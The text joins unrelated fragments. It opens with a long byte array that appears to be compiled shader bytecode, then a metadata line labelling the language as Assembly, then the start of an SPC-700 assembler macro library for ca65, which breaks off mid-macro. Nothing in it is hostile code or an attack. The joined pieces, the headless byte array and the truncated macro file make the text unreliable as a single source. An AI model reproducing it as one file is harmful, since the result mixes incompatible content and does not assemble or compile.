2, 0, 0, 0, 42, 0,
16, 0, 3, 0, 0, 0,
1, 64, 0, 0, 170, 1,
12, 63, 42, 0, 16, 0,
2, 0, 0, 0, 50, 0,
0, 12, 242, 0, 16, 0,
5, 0, 0, 0, 70, 4,
16, 0, 3, 0, 0, 0,
2, 64, 0, 0, 41, 36,
13, 192, 167, 205, 189, 64,
116, 10, 6, 192, 255, 206,
220, 63, 70, 4, 16, 0,
4, 0, 0, 0, 71, 0,
0, 141, 194, 0, 0, 128,
67, 85, 21, 0, 66, 0,
16, 0, 3, 0, 0, 0,
70, 0, 16, 0, 5, 0,
0, 0, 6, 112, 16, 0,
2, 0, 0, 0, 0, 96,
16, 0, 3, 0, 0, 0,
58, 0, 16, 0, 2, 0,
0, 0, 50, 0, 0, 9,
66, 0, 16, 0, 2, 0,
0, 0, 42, 0, 16, 0,
3, 0, 0, 0, 1, 64,
0, 0, 189, 86, 168, 62,
42, 0, 16, 0, 2, 0,
0, 0, 71, 0, 0, 141,
194, 0, 0, 128, 67, 85,
21, 0, 66, 0, 16, 0,
3, 0, 0, 0, 230, 10,
16, 0, 5, 0, 0, 0,
6, 112, 16, 0, 2, 0,
0, 0, 0, 96, 16, 0,
3, 0, 0, 0, 58, 0,
16, 0, 2, 0, 0, 0,
50, 0, 0, 9, 66, 0,
16, 0, 2, 0, 0, 0,
42, 0, 16, 0, 3, 0,
0, 0, 1, 64, 0, 0,
245, 166, 80, 63, 42, 0,
16, 0, 2, 0, 0, 0,
50, 0, 0, 12, 242, 0,
16, 0, 5, 0, 0, 0,
70, 4, 16, 0, 3, 0,
0, 0, 2, 64, 0, 0,
14, 217, 204, 63, 134, 231,
89, 191, 132, 99, 200, 191,
60, 158, 111, 191, 70, 4,
16, 0, 4, 0, 0, 0,
71, 0, 0, 141, 194, 0,
0, 128, 67, 85, 21, 0,
66, 0, 16, 0, 3, 0,
0, 0, 70, 0, 16, 0,
5, 0, 0, 0, 6, 112,
16, 0, 2, 0, 0, 0,
0, 96, 16, 0, 3, 0,
0, 0, 58, 0, 16, 0,
2, 0, 0, 0, 50, 0,
0, 9, 66, 0, 16, 0,
2, 0, 0, 0, 42, 0,
16, 0, 3, 0, 0, 0,
1, 64, 0, 0, 96, 171,
105, 63, 42, 0, 16, 0,
2, 0, 0, 0, 71, 0,
0, 141, 194, 0, 0, 128,
67, 85, 21, 0, 66, 0,
16, 0, 3, 0, 0, 0,
230, 10, 16, 0, 5, 0,
0, 0, 6, 112, 16, 0,
2, 0, 0, 0, 0, 96,
16, 0, 3, 0, 0, 0,
58, 0, 16, 0, 2, 0,
0, 0, 50, 0, 0, 9,
66, 0, 16, 0, 2, 0,
0, 0, 42, 0, 16, 0,
3, 0, 0, 0, 1, 64,
0, 0, 203, 102, 105, 63,
42, 0, 16, 0, 2, 0,
0, 0, 50, 0, 0, 12,
242, 0, 16, 0, 5, 0,
0, 0, 70, 4, 16, 0,
3, 0, 0, 0, 2, 64,
0, 0, 130, 34, 127, 189,
28, 178, 153, 190, 90, 70,
105, 192, 230, 191, 184, 189,
70, 4, 16, 0, 4, 0,
0, 0, 71, 0, 0, 141,
194, 0, 0, 128, 67, 85,
21, 0, 66, 0, 16, 0,
3, 0, 0, 0, 70, 0,
16, 0, 5, 0, 0, 0,
6, 112, 16, 0, 2, 0,
0, 0, 0, 96, 16, 0,
3, 0, 0, 0, 58, 0,
16, 0, 2, 0, 0, 0,
50, 0, 0, 9, 66, 0,
16, 0, 2, 0, 0, 0,
42, 0, 16, 0, 3, 0,
0, 0, 1, 64, 0, 0,
30, 85, 127, 63, 42, 0,
16, 0, 2, 0, 0, 0,
71, 0, 0, 141, 194, 0,
0, 128, 67, 85, 21, 0,
66, 0, 16, 0, 3, 0,
0, 0, 230, 10, 16, 0,
5, 0, 0, 0, 6, 112,
16, 0, 2, 0, 0, 0,
0, 96, 16, 0, 3, 0,
0, 0, 58, 0, 16, 0,
2, 0, 0, 0, 50, 0,
0, 9, 66, 0, 16, 0,
2, 0, 0, 0, 42, 0,
16, 0, 3, 0, 0, 0,
1, 64, 0, 0, 53, 245,
48, 63, 42, 0, 16, 0,
2, 0, 0, 0, 50, 0,
0, 12, 242, 0, 16, 0,
5, 0, 0, 0, 70, 4,
16, 0, 3, 0, 0, 0,
2, 64, 0, 0, 242, 21,
145, 192, 248, 113, 20, 64,
206, 221, 188, 192, 250, 156,
167, 190, 70, 4, 16, 0,
4, 0, 0, 0, 71, 0,
0, 141, 194, 0, 0, 128,
67, 85, 21, 0, 66, 0,
16, 0, 3, 0, 0, 0,
70, 0, 16, 0, 5, 0,
0, 0, 6, 112, 16, 0,
2, 0, 0, 0, 0, 96,
16, 0, 3, 0, 0, 0,
58, 0, 16, 0, 2, 0,
0, 0, 50, 0, 0, 9,
66, 0, 16, 0, 2, 0,
0, 0, 42, 0, 16, 0,
3, 0, 0, 0, 1, 64,
0, 0, 141, 26, 249, 62,
42, 0, 16, 0, 2, 0,
0, 0, 71, 0, 0, 141,
194, 0, 0, 128, 67, 85,
21, 0, 66, 0, 16, 0,
3, 0, 0, 0, 230, 10,
16, 0, 5, 0, 0, 0,
6, 112, 16, 0, 2, 0,
0, 0, 0, 96, 16, 0,
3, 0, 0, 0, 58, 0,
16, 0, 2, 0, 0, 0,
50, 0, 0, 9, 66, 0,
16, 0, 2, 0, 0, 0,
42, 0, 16, 0, 3, 0,
0, 0, 1, 64, 0, 0,
70, 249, 193, 62, 42, 0,
16, 0, 2, 0, 0, 0,
50, 0, 0, 12, 242, 0,
16, 0, 5, 0, 0, 0,
70, 4, 16, 0, 3, 0,
0, 0, 2, 64, 0, 0,
153, 99, 140, 192, 33, 231,
203, 191, 92, 172, 212, 191,
77, 75, 33, 192, 70, 4,
16, 0, 4, 0, 0, 0,
71, 0, 0, 141, 194, 0,
0, 128, 67, 85, 21, 0,
66, 0, 16, 0, 3, 0,
0, 0, 70, 0, 16, 0,
5, 0, 0, 0, 6, 112,
16, 0, 2, 0, 0, 0,
0, 96, 16, 0, 3, 0,
0, 0, 58, 0, 16, 0,
2, 0, 0, 0, 50, 0,
0, 9, 66, 0, 16, 0,
2, 0, 0, 0, 42, 0,
16, 0, 3, 0, 0, 0,
1, 64, 0, 0, 202, 198,
11, 63, 42, 0, 16, 0,
2, 0, 0, 0, 71, 0,
0, 141, 194, 0, 0, 128,
67, 85, 21, 0, 66, 0,
16, 0, 3, 0, 0, 0,
230, 10, 16, 0, 5, 0,
0, 0, 6, 112, 16, 0,
2, 0, 0, 0, 0, 96,
16, 0, 3, 0, 0, 0,
58, 0, 16, 0, 2, 0,
0, 0, 50, 0, 0, 9,
66, 0, 16, 0, 2, 0,
0, 0, 42, 0, 16, 0,
3, 0, 0, 0, 1, 64,
0, 0, 195, 192, 70, 63,
42, 0, 16, 0, 2, 0,
0, 0, 50, 0, 0, 12,
242, 0, 16, 0, 5, 0,
0, 0, 70, 4, 16, 0,
3, 0, 0, 0, 2, 64,
0, 0, 79, 46, 200, 192,
219, 109, 171, 63, 127, 121,
66, 61, 254, 123, 246, 191,
70, 4, 16, 0, 4, 0,
0, 0, 71, 0, 0, 141,
194, 0, 0, 128, 67, 85,
21, 0, 66, 0, 16, 0,
3, 0, 0, 0, 70, 0,
16, 0, 5, 0, 0, 0,
6, 112, 16, 0, 2, 0,
0, 0, 0, 96, 16, 0,
3, 0, 0, 0, 58, 0,
16, 0, 2, 0, 0, 0,
50, 0, 0, 9, 66, 0,
16, 0, 2, 0, 0, 0,
42, 0, 16, 0, 3, 0,
0, 0, 1, 64, 0, 0,
59, 67, 164, 62, 42, 0,
16, 0, 2, 0, 0, 0,
71, 0, 0, 141, 194, 0,
0, 128, 67, 85, 21, 0,
66, 0, 16, 0, 3, 0,
0, 0, 230, 10, 16, 0,
5, 0, 0, 0, 6, 112,
16, 0, 2, 0, 0, 0,
0, 96, 16, 0, 3, 0,
0, 0, 58, 0, 16, 0,
2, 0, 0, 0, 50, 0,
0, 9, 66, 0, 16, 0,
2, 0, 0, 0, 42, 0,
16, 0, 3, 0, 0, 0,
1, 64, 0, 0, 211, 237,
102, 63, 42, 0, 16, 0,
2, 0, 0, 0, 50, 0,
0, 12, 242, 0, 16, 0,
5, 0, 0, 0, 70, 4,
16, 0, 3, 0, 0, 0,
2, 64, 0, 0, 17, 225,
14, 64, 79, 148, 24, 192,
188, 91, 135, 192, 45, 39,
98, 192, 70, 4, 16, 0,
4, 0, 0, 0, 71, 0,
0, 141, 194, 0, 0, 128,
67, 85, 21, 0, 66, 0,
16, 0, 3, 0, 0, 0,
70, 0, 16, 0, 5, 0,
0, 0, 6, 112, 16, 0,
2, 0, 0, 0, 0, 96,
16, 0, 3, 0, 0, 0,
58, 0, 16, 0, 2, 0,
0, 0, 50, 0, 0, 9,
66, 0, 16, 0, 2, 0,
0, 0, 42, 0, 16, 0,
3, 0, 0, 0, 1, 64,
0, 0, 3, 89, 62, 63,
42, 0, 16, 0, 2, 0,
0, 0, 71, 0, 0, 141,
194, 0, 0, 128, 67, 85,
21, 0, 66, 0, 16, 0,
3, 0, 0, 0, 230, 10,
16, 0, 5, 0, 0, 0,
6, 112, 16, 0, 2, 0,
0, 0, 0, 96, 16, 0,
3, 0, 0, 0, 58, 0,
16, 0, 2, 0, 0, 0,
50, 0, 0, 9, 66, 0,
16, 0, 2, 0, 0, 0,
42, 0, 16, 0, 3, 0,
0, 0, 1, 64, 0, 0,
252, 46, 220, 62, 42, 0,
16, 0, 2, 0, 0, 0,
50, 0, 0, 12, 242, 0,
16, 0, 5, 0, 0, 0,
70, 4, 16, 0, 3, 0,
0, 0, 2, 64, 0, 0,
85, 166, 183, 192, 43, 48,
42, 192, 65, 158, 137, 191,
129, 193, 158, 192, 70, 4,
16, 0, 4, 0, 0, 0,
71, 0, 0, 141, 194, 0,
0, 128, 67, 85, 21, 0,
66, 0, 16, 0, 3, 0,
0, 0, 70, 0, 16, 0,
5, 0, 0, 0, 6, 112,
16, 0, 2, 0, 0, 0,
0, 96, 16, 0, 3, 0,
0, 0, 58, 0, 16, 0,
2, 0, 0, 0, 50, 0,
0, 9, 66, 0, 16, 0,
2, 0, 0, 0, 42, 0,
16, 0, 3, 0, 0, 0,
1, 64, 0, 0, 90, 130,
168, 62, 42, 0, 16, 0,
2, 0, 0, 0, 71, 0,
0, 141, 194, 0, 0, 128,
67, 85, 21, 0, 66, 0,
16, 0, 3, 0, 0, 0,
230, 10, 16, 0, 5, 0,
0, 0, 6, 112, 16, 0,
2, 0, 0, 0, 0, 96,
16, 0, 3, 0, 0, 0,
58, 0, 16, 0, 2, 0,
0, 0, 50, 0, 0, 9,
66, 0, 16, 0, 2, 0,
0, 0, 42, 0, 16, 0,
3, 0, 0, 0, 1, 64,
0, 0, 97, 68, 250, 62,
42, 0, 16, 0, 2, 0,
0, 0, 50, 0, 0, 12,
242, 0, 16, 0, 5, 0,
0, 0, 70, 4, 16, 0,
3, 0, 0, 0, 2, 64,
0, 0, 253, 16, 79, 192,
196, 232, 162, 192, 222, 172,
168, 64, 121, 34, 29, 192,
70, 4, 16, 0, 4, 0,
0, 0, 71, 0, 0, 141,
194, 0, 0, 128, 67, 85,
21, 0, 66, 0, 16, 0,
3, 0, 0, 0, 70, 0,
16, 0, 5, 0, 0, 0,
6, 112, 16, 0, 2, 0,
0, 0, 0, 96, 16, 0,
3, 0, 0, 0, 58, 0,
16, 0, 2, 0, 0, 0,
50, 0, 0, 9, 66, 0,
16, 0, 2, 0, 0, 0,
42, 0, 16, 0, 3, 0,
0, 0, 1, 64, 0, 0,
98, 89, 186, 62, 42, 0,
16, 0, 2, 0, 0, 0,
71, 0, 0, 141, 194, 0,
0, 128, 67, 85, 21, 0,
66, 0, 16, 0, 3, 0,
0, 0, 230, 10, 16, 0,
5, 0, 0, 0, 6, 112,
16, 0, 2, 0, 0, 0,
0, 96, 16, 0, 3, 0,
0, 0, 58, 0, 16, 0,
2, 0, 0, 0, 50, 0,
0, 9, 66, 0, 16, 0,
2, 0, 0, 0, 42, 0,
16, 0, 3, 0, 0, 0,
1, 64, 0, 0, 67, 39,
200, 62, 42, 0, 16, 0,
2, 0, 0, 0, 50, 0,
0, 12, 242, 0, 16, 0,
5, 0, 0, 0, 70, 4,
16, 0, 3, 0, 0, 0,
2, 64, 0, 0, 65, 157,
236, 63, 58, 117, 129, 192,
154, 134, 143, 64, 193, 26,
133, 191, 70, 4, 16, 0,
4, 0, 0, 0, 71, 0,
0, 141, 194, 0, 0, 128,
67, 85, 21, 0, 66, 0,
16, 0, 3, 0, 0, 0,
70, 0, 16, 0, 5, 0,
0, 0, 6, 112, 16, 0,
2, 0, 0, 0, 0, 96,
16, 0, 3, 0, 0, 0,
58, 0, 16, 0, 2, 0,
0, 0, 50, 0, 0, 9,
66, 0, 16, 0, 2, 0,
0, 0, 42, 0, 16, 0,
3, 0, 0, 0, 1, 64,
0, 0, 31, 196, 19, 63,
42, 0, 16, 0, 2, 0,
0, 0, 71, 0, 0, 141,
194, 0, 0, 128, 67, 85,
21, 0, 66, 0, 16, 0,
3, 0, 0, 0, 230, 10,
16, 0, 5, 0, 0, 0,
6, 112, 16, 0, 2, 0,
0, 0, 0, 96, 16, 0,
3, 0, 0, 0, 58, 0,
16, 0, 2, 0, 0, 0,
50, 0, 0, 9, 66, 0,
16, 0, 2, 0, 0, 0,
42, 0, 16, 0, 3, 0,
0, 0, 1, 64, 0, 0,
154, 18, 14, 63, 42, 0,
16, 0, 2, 0, 0, 0,
50, 0, 0, 12, 242, 0,
16, 0, 5, 0, 0, 0,
70, 4, 16, 0, 3, 0,
0, 0, 2, 64, 0, 0,
111, 13, 148, 189, 76, 139,
97, 192, 15, 13, 197, 63,
29, 232, 198, 192, 70, 4,
16, 0, 4, 0, 0, 0,
71, 0, 0, 141, 194, 0,
0, 128, 67, 85, 21, 0,
66, 0, 16, 0, 3, 0,
0, 0, 70, 0, 16, 0,
5, 0, 0, 0, 6, 112,
16, 0, 2, 0, 0, 0,
0, 96, 16, 0, 3, 0,
0, 0, 58, 0, 16, 0,
2, 0, 0, 0, 50, 0,
0, 9, 66, 0, 16, 0,
2, 0, 0, 0, 42, 0,
16, 0, 3, 0, 0, 0,
1, 64, 0, 0, 224, 71,
53, 63, 42, 0, 16, 0,
2, 0, 0, 0, 71, 0,
0, 141, 194, 0, 0, 128,
67, 85, 21, 0, 66, 0,
16, 0, 3, 0, 0, 0,
230, 10, 16, 0, 5, 0,
0, 0, 6, 112, 16, 0,
2, 0, 0, 0, 0, 96,
16, 0, 3, 0, 0, 0,
58, 0, 16, 0, 2, 0,
0, 0, 50, 0, 0, 9,
66, 0, 16, 0, 2, 0,
0, 0, 42, 0, 16, 0,
3, 0, 0, 0, 1, 64,
0, 0, 78, 230, 163, 62,
42, 0, 16, 0, 2, 0,
0, 0, 50, 0, 0, 12,
242, 0, 16, 0, 5, 0,
0, 0, 70, 4, 16, 0,
3, 0, 0, 0, 2, 64,
0, 0, 207, 215, 217, 190,
15, 26, 206, 192, 74, 69,
135, 64, 165, 243, 152, 192,
70, 4, 16, 0, 4, 0,
0, 0, 71, 0, 0, 141,
194, 0, 0, 128, 67, 85,
21, 0, 66, 0, 16, 0,
3, 0, 0, 0, 70, 0,
16, 0, 5, 0, 0, 0,
6, 112, 16, 0, 2, 0,
0, 0, 0, 96, 16, 0,
3, 0, 0, 0, 58, 0,
16, 0, 2, 0, 0, 0,
50, 0, 0, 9, 66, 0,
16, 0, 2, 0, 0, 0,
42, 0, 16, 0, 3, 0,
0, 0, 1, 64, 0, 0,
170, 239, 160, 62, 42, 0,
16, 0, 2, 0, 0, 0,
71, 0, 0, 141, 194, 0,
0, 128, 67, 85, 21, 0,
66, 0, 16, 0, 3, 0,
0, 0, 230, 10, 16, 0,
5, 0, 0, 0, 6, 112,
16, 0, 2, 0, 0, 0,
0, 96, 16, 0, 3, 0,
0, 0, 58, 0, 16, 0,
2, 0, 0, 0, 50, 0,
0, 9, 66, 0, 16, 0,
2, 0, 0, 0, 42, 0,
16, 0, 3, 0, 0, 0,
1, 64, 0, 0, 54, 59,
165, 62, 42, 0, 16, 0,
2, 0, 0, 0, 50, 0,
0, 12, 242, 0, 16, 0,
5, 0, 0, 0, 70, 4,
16, 0, 3, 0, 0, 0,
2, 64, 0, 0, 0, 139,
203, 64, 0, 43, 138, 190,
43, 221, 95, 64, 198, 162,
85, 192, 70, 4, 16, 0,
4, 0, 0, 0, 71, 0,
0, 141, 194, 0, 0, 128,
67, 85, 21, 0, 66, 0,
16, 0, 3, 0, 0, 0,
70, 0, 16, 0, 5, 0,
0, 0, 6, 112, 16, 0,
2, 0, 0, 0, 0, 96,
16, 0, 3, 0, 0, 0,
58, 0, 16, 0, 2, 0,
0, 0, 50, 0, 0, 9,
66, 0, 16, 0, 2, 0,
0, 0, 42, 0, 16, 0,
3, 0, 0, 0, 1, 64,
0, 0, 146, 19, 166, 62,
42, 0, 16, 0, 2, 0,
0, 0, 71, 0, 0, 141,
194, 0, 0, 128, 67, 85,
21, 0, 66, 0, 16, 0,
3, 0, 0, 0, 230, 10,
16, 0, 5, 0, 0, 0,
6, 112, 16, 0, 2, 0,
0, 0, 0, 96, 16, 0,
3, 0, 0, 0, 58, 0,
16, 0, 2, 0, 0, 0,
50, 0, 0, 9, 66, 0,
16, 0, 2, 0, 0, 0,
42, 0, 16, 0, 3, 0,
0, 0, 1, 64, 0, 0,
238, 185, 5, 63, 42, 0,
16, 0, 2, 0, 0, 0,
50, 0, 0, 12, 242, 0,
16, 0, 5, 0, 0, 0,
70, 4, 16, 0, 3, 0,
0, 0, 2, 64, 0, 0,
163, 229, 146, 192, 45, 8,
122, 64, 167, 121, 7, 64,
60, 221, 139, 63, 70, 4,
16, 0, 4, 0, 0, 0,
71, 0, 0, 141, 194, 0,
0, 128, 67, 85, 21, 0,
66, 0, 16, 0, 3, 0,
0, 0, 70, 0, 16, 0,
5, 0, 0, 0, 6, 112,
16, 0, 2, 0, 0, 0,
0, 96, 16, 0, 3, 0,
0, 0, 58, 0, 16, 0,
2, 0, 0, 0, 50, 0,
0, 9, 66, 0, 16, 0,
2, 0, 0, 0, 42, 0,
16, 0, 3, 0, 0, 0,
1, 64, 0, 0, 47, 155,
186, 62, 42, 0, 16, 0,
2, 0, 0, 0, 71, 0,
0, 141, 194, 0, 0, 128,
67, 85, 21, 0, 66, 0,
16, 0, 3, 0, 0, 0,
230, 10, 16, 0, 5, 0,
0, 0, 6, 112, 16, 0,
2, 0, 0, 0, 0, 96,
16, 0, 3, 0, 0, 0,
58, 0, 16, 0, 2, 0,
0, 0, 50, 0, 0, 9,
66, 0, 16, 0, 2, 0,
0, 0, 42, 0, 16, 0,
3, 0, 0, 0, 1, 64,
0, 0, 103, 170, 90, 63,
42, 0, 16, 0, 2, 0,
0, 0, 50, 0, 0, 12,
50, 0, 16, 0, 3, 0,
0, 0, 70, 0, 16, 0,
3, 0, 0, 0, 2, 64,
0, 0, 4, 55, 194, 64,
57, 69, 177, 63, 0, 0,
0, 0, 0, 0, 0, 0,
70, 0, 16, 0, 4, 0,
0, 0, 71, 0, 0, 141,
194, 0, 0, 128, 67, 85,
21, 0, 130, 0, 16, 0,
2, 0, 0, 0, 70, 0,
16, 0, 3, 0, 0, 0,
6, 112, 16, 0, 2, 0,
0, 0, 0, 96, 16, 0,
3, 0, 0, 0, 58, 0,
16, 0, 2, 0, 0, 0,
50, 0, 0, 9, 66, 0,
16, 0, 2, 0, 0, 0,
58, 0, 16, 0, 2, 0,
0, 0, 1, 64, 0, 0,
71, 124, 174, 62, 42, 0,
16, 0, 2, 0, 0, 0,
56, 0, 0, 7, 66, 0,
16, 0, 2, 0, 0, 0,
42, 0, 16, 0, 2, 0,
0, 0, 1, 64, 0, 0,
60, 254, 52, 61, 54, 0,
0, 5, 130, 0, 16, 0,
0, 0, 0, 0, 1, 64,
0, 0, 0, 0, 0, 0,
18, 0, 0, 1, 54, 0,
0, 5, 66, 0, 16, 0,
2, 0, 0, 0, 1, 64,
0, 0, 0, 0, 128, 63,
21, 0, 0, 1, 51, 0,
0, 7, 34, 0, 16, 0,
2, 0, 0, 0, 42, 0,
16, 0, 2, 0, 0, 0,
26, 0, 16, 0, 2, 0,
0, 0, 30, 0, 0, 7,
18, 0, 16, 0, 2, 0,
0, 0, 10, 0, 16, 0,
2, 0, 0, 0, 1, 64,
0, 0, 1, 0, 0, 0,
22, 0, 0, 1, 54, 0,
0, 5, 242, 32, 16, 0,
0, 0, 0, 0, 86, 5,
16, 0, 2, 0, 0, 0,
62, 0, 0, 1, 83, 84,
65, 84, 148, 0, 0, 0,
159, 0, 0, 0, 6, 0,
0, 0, 0, 0, 0, 0,
2, 0, 0, 0, 91, 0,
0, 0, 2, 0, 0, 0,
7, 0, 0, 0, 2, 0,
0, 0, 2, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
1, 0, 0, 0, 41, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 9, 0,
0, 0, 0, 0, 0, 0,
1, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0
};
| {
"language": "Assembly"
} |
; SPC-700 Assembler for ca65
; by Shay Green <[email protected]>
.ifndef ::__MBSFX_SMP_Assembler__
::__MBSFX_SMP_Assembler__ = 1
;-------------------------------------------------------------------------------
.setcpu "none"
.ifndef DEFAULT_ABS
DEFAULT_ABS = 0
.endif
.ifndef WARN_DEFAULT_ABS
WARN_DEFAULT_ABS = 0
.endif
.if WARN_DEFAULT_ABS
.define _op_warn_default_abs .assert 0, warning, "Defaulting to absolute addressing"
.else
.define _op_warn_default_abs
.endif
;**** OP a, src
;**** OP dest, a
; d, !a, (X), [d+X],
.macro _op_a op, val
.if .xmatch (.left (1, {val}), !)
.if .xmatch (.right (2, {val}), +x)
.byte $15+op ; !a+X
.word .mid (1, .tcount ({val})-3, {val})
.elseif .xmatch (.right (2, {val}), +y)
.byte $16+op ; !a+Y
.word .mid (1, .tcount ({val})-3, {val})
.else
.byte $05+op ; !a
.word .right (.tcount ({val})-1, {val})
.endif
.elseif .xmatch (.left (1, {val}), [)
.if .xmatch (.right (3, {val}), +x])
.byte $07+op, .mid (1, .tcount ({val})-4, {val}) ; [d+X]
.elseif .xmatch (.right (3, {val}), ]+y)
.byte $17+op, .mid (1, .tcount ({val})-4, {val}) ; [d]+Y
.else
.assert 0, error, "unrecognized [] addressing mode"
.endif
.elseif .xmatch ({val}, {(x)})
.byte $06+op ; (X)
.elseif DEFAULT_ABS && (!.xmatch (.left (1, {val}), <))
_op_warn_default_abs
.if .xmatch (.right (2, {val}), +x)
.byte $15+op ; a+X
.word .left (.tcount ({val})-2, {val})
.elseif .xmatch (.right (2, {val}), +y)
.byte $16+op ; a+Y
.word .left (.tcount ({val})-2, {val})
.else
.byte $05+op ; a
.word val
.endif
.elseif .xmatch (.right (2, {val}), +x)
.byte $14+op, .left (.tcount ({val})-2, {val}) ; d+X
.else
.byte $04+op, val ; d
.endif
.endmacro
.macro _op_imm op, val
.if .xmatch (.left (1, {val}), #)
.byte $08+op, .right (.tcount ({val})-1, {val}) ; #
.else
_op_a op, {val}
.endif
.endmacro
.macro _arith_a op, dest, src
.if .xmatch (.left (1, {dest}), a)
_op_imm op, src ; a, src
.elseif .xmatch (.left (1, {src}), #)
.byte $18+op, .right (.tcount ({src})-1, {src}), dest ; d, #
.elseif .xmatch ({dest}, {(x)}) && .xmatch ({src}, {(y)})
.byte $19+op ; (x), (y)
.else
.byte $09+op, src, dest ; dd, ds
.endif
.endmacro
.define or _arith_a $00, ; dest, src
.define and_ _arith_a $20, ; dest, src
.define eor_ _arith_a $40, ; dest, src
.define adc_ _arith_a $80, ; dest, src
.define sbc_ _arith_a $A0, ; dest, src
;**** MOV dest, src
.macro _mov_a op, op_xplus, val
.if .xmatch ({val}, {(x)+})
.byte op_xplus ; (X)+
.elseif .xmatch ({val}, x)
.byte op-$63 ; x
.elseif .xmatch ({val}, y)
.byte op-$03 ; y
.else
_op_imm op, {val}
.endif
.endmacro
.macro _mov_y op, val
.if .xmatch (.left (1, {val}), !)
.byte $ec-op
.word .right (.tcount ({val})-1, {val})
.elseif .xmatch (.right (2, {val}), +x)
.byte $fb-op, .left (.tcount ({val})-2, {val})
.elseif DEFAULT_ABS && (!.xmatch (.left (1, {val}), <))
_op_warn_default_abs
.byte $ec-op
.word val
.else
.byte $eb-op, val
.endif
.endmacro
.macro _mov_x op, val
.if .xmatch (.left (1, {val}), !)
.byte $e9-op
.word .right (.tcount ({val})-1, {val})
.elseif .xmatch (.right (2, {val}), +y)
.byte $f9-op, .left (.tcount ({val})-2, {val})
.elseif DEFAULT_ABS && (!.xmatch (.left (1, {val}), <))
_op_warn_default_abs
.byte $e9-op
.word val
.else
.byte $f8-op, val
.endif
.endmacro
.macro mov dest, src
.if .xmatch ({dest}, y)
.if .xmatch (.left (1, {src}), #)
.byte $8d, .right (.tcount ({src})-1, {src})
.elseif .xmatch ({src}, a)
.byte $fd ; a (inconsistent encoding)
.else
_mov_y 0, {src}
.endif
.elseif .xmatch ({dest}, a)
_mov_a $e0, $BF, src ; MOV A, src
.elseif .xmatch ({src}, a)
_mov_a $c0, $AF, dest ; MOV dest, A
.elseif .xmatch ({dest}, x)
.if .xmatch (.left (1, {src}), #)
.byte $cd, .right (.tcount ({src})-1, {src})
.elseif .xmatch ({src}, sp)
.byte $9d
.else
_mov_x 0, src
.endif
.elseif .xmatch ({src}, x)
.if .xmatch ({dest}, sp)
.byte $BD
.else
_mov_x $20, dest
.endif
.elseif .xmatch ({src}, y)
_mov_y $20, {dest}
.elseif .xmatch (.left (1, {src}), #)
.byte $8f, .right (.tcount ({src})-1, {src}), dest
.else
.byte $fa, src, dest
.endif
.endmacro
;**** CMP src1, src2
.macro _cmp_xy op, immop, val
.if .xmatch (.left (1, {val}), #)
.byte immop, .right (.tcount ({val})-1, {val}) ; #
.elseif .xmatch (.left (1, {val}), !)
.byte $1e+op ; !a
.word .right (.tcount ({val})-1, {val})
.elseif DEFAULT_ABS && (!.xmatch (.left (1, {val}), <))
_op_warn_default_abs
.byte $1e+op ; a
.word val
.else
.byte $3e+op, val ; d
.endif
.endmacro
.macro cmp_ dest, src
.if .xmatch ({dest}, x)
_cmp_xy 0, $c8, {src}
.elseif .xmatch ({dest}, y)
_cmp_xy $40, $ad, {src}
.else
_arith_a $60, dest, src
.endif
.endmacro
;**** RMW dest
.macro _op_shift op, val
.if .xmatch ({val}, a)
.byte $1c+op ; A
.elseif .xmatch (.left (1, {val}), !)
.byte $0c+op ; !a
.word .right (.tcount ({val})-1, {val})
.elseif .xmatch (.right (2, {val}), +x)
.byte $1b+op, .left (.tcount ({val})-2, {val})
.elseif DEFAULT_ABS && (!.xmatch (.left (1, {val}), <))
_op_warn_default_abs
.byte $0c+op
.word val
.else
.byte $0b+op, val
.endif
.endmacro
.macro _inc_dec op, val
.if .xmatch ({val}, x)
.byte $1d+op ; x
.elseif .xmatch ({val}, y)
.byte $dc+op ; y
.else
_op_shift $80+op, {val}
.endif
.endmacro
.define dec_ _inc_dec $00, ; val
.define inc_ _inc_dec $20, ; val
.define lsr_ _op_shift $40, ; val
.define asl_ _op_shift $00, ; val
.define rol_ _op_shift $20, ; val
.define ror_ _op_shift $60, ; val
;**** PUSH/POP
.macro _push_pop op, val
.if .xmatch ({val}, a)
.byte $2d+op
.elseif .xmatch ({val}, x)
.byte $4d+op
.elseif .xmatch ({val}, y)
.byte $6d+op
.elseif .xmatch ({val}, psw)
.byte $0d+op
.else
.assert 0, error, "invalid register"
.endif
.endmacro
.define push _push_pop $00,
.define pop _push_pop $81,
;**** SET1/CLR1
.macro _op_bit op, bitval, val
.local @begin
@begin:
.repeat .tcount ({val}), i
.if .xmatch (.mid (i, 1, {val}), .)
.byte op + (bitval * .right (.tcount ({val})-(i+1), {val}))
.byte .left (i, {val})
.endif
.endrepeat
; TODO: report error during assembly rather than linking
.assert (*-@begin) = 2, error, "unsupported addressing mode"
.endmacro
.define set1 _op_bit $02, $20,
.define clr1 _op_bit $12, $20,
;**** Branch
.macro _branch_offset instr, target
.local @distance, @next
@distance = (target) - @next
instr
.assert @distance >= -128 && @distance <= 127, error, "branch out of range"
.byte <@distance
@next:
.endmacro
.macro _op_branch inst, target
_branch_offset {.byte inst}, target
.endmacro
.macro bbs val, target
_branch_offset {_op_bit $03, $20, val}, target
.endmacro
.macro bbc val, target
_branch_offset {_op_bit $13, $20, val}, target
.endmacro
.macro dbnz val, target
.if .xmatch ({val}, y)
_op_branch $fe, target
.else
_op_branch {$6e, val}, (target)
.endif
.endmacro
.macro cbne val, target
.if .xmatch (.right (2, {val}), +x)
_branch_offset {.byte $de, .left (.tcount ({val})-2, {val})}, target
.else
_branch_offset {.byte $2e, val}, target
.endif
.endmacro
.define bpl _op_branch $10, ; target
.define bra _op_branch $2f, ; target
.define bmi _op_branch $30, ; target
.define bvc _op_branch $50, ; target
.define bvs _op_branch $70, ; target
.define bcc _op_branch $90, ; target
.define bcs _op_branch $B0, ; target
.define bne _op_branch $D0, ; target
.define beq _op_branch $f0, ; target
;**** OP !abs
.macro _op_abs op, val; ****
.if .xmatch (.left (1, {val}), !)
.byte op
.word .right (.tcount ({val})-1, {val})
.elseif DEFAULT_ABS && (!.xmatch (.left (1, {val}), <))
